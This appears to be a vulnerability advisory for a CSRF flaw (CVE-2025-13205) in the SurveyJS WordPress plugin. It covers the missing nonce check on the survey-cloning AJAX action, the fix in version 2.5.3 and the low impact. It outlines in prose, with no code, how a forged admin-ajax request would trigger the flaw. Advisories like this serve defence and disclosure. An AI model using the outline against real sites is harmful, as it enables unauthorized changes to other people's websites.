– Proof of Concept - Atomic Edge

Atomic Edge analysis of CVE-2025-13205 (metadata-based):
This vulnerability is a Cross-Site Request Forgery (CSRF) flaw in the SurveyJS WordPress plugin, affecting versions up to and including 2.5.2. The issue resides in the AJAX handler responsible for cloning surveys. The missing nonce validation allows attackers to trick authenticated administrators into performing unintended actions, leading to unauthorized survey duplication.

Atomic Edge research identifies the root cause as a missing capability check or nonce verification on the `SurveyJS_CloneSurvey` AJAX action. The vulnerability description explicitly states missing or incorrect nonce validation. This conclusion is directly confirmed by the CVE description. The CWE classification of 352 (CSRF) supports this finding, indicating a failure to verify the origin and intent of a state-changing request.

Exploitation requires an attacker to craft a malicious web page or link that submits a forged POST request to the WordPress admin AJAX endpoint. The target must be an authenticated administrator who visits the attacker’s page. The payload would be a request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `SurveyJS_CloneSurvey`. The request would include parameters like `survey_id` to specify which survey to clone. No nonce parameter is required for the attack to succeed.

Remediation requires adding a nonce check to the `SurveyJS_CloneSurvey` AJAX handler. The patched version, 2.5.3, likely implements a call to `check_ajax_referer()` or `wp_verify_nonce()` within the callback function. This ensures the request originates from the intended user session. A capability check, such as `current_user_can(‘manage_options’)`, should also be present to enforce proper authorization.

The impact of successful exploitation is unauthorized duplication of existing surveys. This constitutes an integrity violation (I:L in the CVSS vector). Attackers cannot directly steal data or escalate privileges through this flaw alone. The attack requires user interaction (UI:R) and does not affect confidentiality or availability. Repeated exploitation could clutter a site with duplicate survey content, causing administrative overhead.